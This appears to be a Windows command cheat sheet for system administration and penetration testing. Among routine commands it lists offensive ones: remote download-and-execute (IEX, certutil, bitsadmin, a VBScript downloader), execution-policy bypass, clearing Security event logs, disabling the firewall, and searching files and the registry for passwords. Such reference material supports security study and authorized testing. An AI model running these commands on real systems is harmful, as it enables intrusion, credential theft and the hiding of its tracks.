
Windows Commands

System Information

# System info
systeminfo
hostname
ver

# OS information
wmic os get caption,version,buildnumber,osarchitecture
Get-ComputerInfo (PowerShell)

# Environment variables
set
echo %PATH%
$env:PATH (PowerShell)

# Architecture
wmic cpu get caption,deviceid,name,numberofcores
echo %PROCESSOR_ARCHITECTURE%

User Information

# Current user
whoami
whoami /all
whoami /priv

# List users
net user
net user <username>
wmic useraccount list full

# Local groups
net localgroup
net localgroup administrators

# Domain information
net user /domain
net group /domain
net group "Domain Admins" /domain

Network Information

# IP configuration
ipconfig
ipconfig /all

# Routing table
route print
netstat -r

# Network connections
netstat -ano
netstat -anob

# ARP table
arp -a

# DNS cache
ipconfig /displaydns
ipconfig /flushdns

# Hosts file
type C:\Windows\System32\drivers\etc\hosts

# Firewall
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all

Process Management

# List processes
tasklist
tasklist /v
wmic process list full
Get-Process (PowerShell)

# Kill process
taskkill /PID <pid>
taskkill /IM process.exe
taskkill /F /IM process.exe  # Force
Stop-Process -Id <pid> (PowerShell)

# Start process
start process.exe
Start-Process process.exe (PowerShell)

File Operations

# Directory listing
dir
dir /a  # Show hidden
dir /s  # Recursive
Get-ChildItem (PowerShell)
Get-ChildItem -Force  # Show hidden
Get-ChildItem -Recurse

# Find files
dir /s file.txt
where /r C:\ file.txt
Get-ChildItem -Path C:\ -Filter file.txt -Recurse

# Search for text in files
findstr /si "password" *.txt
findstr /si "password" *.config
Get-ChildItem -Recurse | Select-String "password"

# File permissions (the /grant example below gives Everyone full control of the folder)
icacls file.txt
icacls C:\folder /grant Everyone:F

# Copy/Move
copy file.txt C:\destination\
xcopy /s /e source dest
robocopy source dest /E
move file.txt C:\destination\

# Delete
del file.txt
del /f /q file.txt  # Force, quiet
rmdir /s /q directory

# Create directory
mkdir directory
md directory
New-Item -ItemType Directory -Path C:\directory (PowerShell)

# File attributes
attrib file.txt
attrib +h file.txt  # Hidden
attrib -h file.txt  # Unhide

Service Management

# List services
sc query
sc query state= all
wmic service list brief
Get-Service (PowerShell)

# Service details
sc qc <service_name>
Get-Service <service_name> | Format-List (PowerShell)

# Start/Stop service
sc start <service_name>
sc stop <service_name>
net start <service_name>
net stop <service_name>
Start-Service <service_name> (PowerShell)
Stop-Service <service_name> (PowerShell)

# Service configuration
sc config <service_name> start= auto
sc config <service_name> binpath= "C:\path\to\binary.exe"

Scheduled Tasks

# List tasks
schtasks /query
schtasks /query /fo LIST /v
Get-ScheduledTask (PowerShell)

# Create task
schtasks /create /tn "TaskName" /tr "C:\path\to\program.exe" /sc daily /st 12:00

# Delete task
schtasks /delete /tn "TaskName"

# Run task
schtasks /run /tn "TaskName"

Registry

# Query
reg query HKLM\Software\Microsoft\Windows\CurrentVersion
reg query HKCU\Software

# Add value
reg add "HKLM\Software\Test" /v TestValue /t REG_SZ /d "Data"

# Delete
reg delete "HKLM\Software\Test" /v TestValue

# Export
reg export HKLM\Software\Test export.reg

# Import
reg import import.reg

# PowerShell
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion"
New-ItemProperty -Path "HKLM:\Software\Test" -Name "TestValue" -Value "Data"

PowerShell

# Execution policy
Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Bypass -Scope Process

# Run script
powershell -File script.ps1
powershell -ExecutionPolicy Bypass -File script.ps1

# Run command
powershell -Command "Get-Process"

# Encoded command
$command = 'Get-Process'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand

# Download file
Invoke-WebRequest -Uri http://example.com/file.txt -OutFile C:\file.txt
wget http://example.com/file.txt -OutFile C:\file.txt
iwr http://example.com/file.txt -OutFile C:\file.txt

# Download and execute
IEX (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')

# Get command history
Get-History
(Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath

Event Logs

# List logs
wevtutil el
Get-EventLog -List (PowerShell)

# Query log
wevtutil qe Security /f:text
wevtutil qe System /c:10 /rd:true /f:text
Get-EventLog -LogName System -Newest 10 (PowerShell)
Get-WinEvent -LogName Security -MaxEvents 10 (PowerShell)

# Clear logs
wevtutil cl System
wevtutil cl Security
Clear-EventLog -LogName System (PowerShell)

# Filter events
wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} (PowerShell)

Firewall

# Status
netsh advfirewall show allprofiles
Get-NetFirewallProfile (PowerShell)

# Add rule
netsh advfirewall firewall add rule name="Allow Port 80" dir=in action=allow protocol=TCP localport=80
New-NetFirewallRule -DisplayName "Allow Port 80" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Allow (PowerShell)

# Delete rule
netsh advfirewall firewall delete rule name="Allow Port 80"
Remove-NetFirewallRule -DisplayName "Allow Port 80" (PowerShell)

# Disable firewall
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False (PowerShell)

File Download

# Certutil
certutil -urlcache -f http://example.com/file.exe file.exe

# BITSAdmin
bitsadmin /transfer mydownload /download /priority high http://example.com/file.exe C:\file.exe

# PowerShell
Invoke-WebRequest -Uri http://example.com/file.exe -OutFile C:\file.exe
(New-Object System.Net.WebClient).DownloadFile('http://example.com/file.exe', 'C:\file.exe')

# VBScript
echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>download.vbs
echo objXMLHTTP.open "GET","http://example.com/file.exe",False>>download.vbs
echo objXMLHTTP.send()>>download.vbs
echo Set objADOStream=CreateObject("ADODB.Stream")>>download.vbs
echo objADOStream.Open>>download.vbs
echo objADOStream.Type=1>>download.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody>>download.vbs
echo objADOStream.Position=0>>download.vbs
echo objADOStream.SaveToFile "C:\file.exe">>download.vbs
echo objADOStream.Close>>download.vbs
cscript download.vbs

Network Shares

# List shares
net share
net view \\computername
wmic share list brief

# Map drive
net use Z: \\server\share
net use Z: \\server\share /user:username password

# Disconnect
net use Z: /delete
net use * /delete

# Access share
\\server\share\file.txt

Active Directory

# Domain info
echo %USERDOMAIN%
echo %LOGONSERVER%

# Domain users
net user /domain
dsquery user

# Domain groups
net group /domain
dsquery group

# Domain computers
net group "Domain Computers" /domain
dsquery computer

# Group members
net group "Domain Admins" /domain

Credential Management

# Saved credentials
cmdkey /list

# Add credential
cmdkey /add:server /user:username /pass:password

# Delete credential
cmdkey /delete:server

# RunAs
runas /user:domain\user "cmd.exe"
runas /netonly /user:domain\user "cmd.exe"

Miscellaneous

# Command history
doskey /history
F7 (interactive)

# Clear screen
cls

# Calculate hash
certutil -hashfile file.txt MD5
certutil -hashfile file.txt SHA256
Get-FileHash file.txt (PowerShell)

# Base64
certutil -encode file.txt file.b64
certutil -decode file.b64 file.txt
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.txt")) (PowerShell)
[IO.File]::WriteAllBytes("file.txt", [Convert]::FromBase64String("BASE64")) (PowerShell)

# Alternate Data Streams
dir /r
Get-Item -Path file.txt -Stream *
notepad file.txt:hidden.txt

# Shutdown/Restart
shutdown /s /t 0
shutdown /r /t 0
shutdown /a  # Abort

Useful One-liners

# Find writable directories (note: dir output contains no ACL data, so this filter only matches names containing these strings)
dir /s /a C:\ | findstr /i "Everyone" | findstr /i "BUILTIN\Users"

# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Find config files
dir /s *pass* == *cred* == *vnc* == *.config*

# Installed programs
wmic product get name,version
dir "C:\Program Files"
dir "C:\Program Files (x86)"

# Auto-start programs
wmic startup list full
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run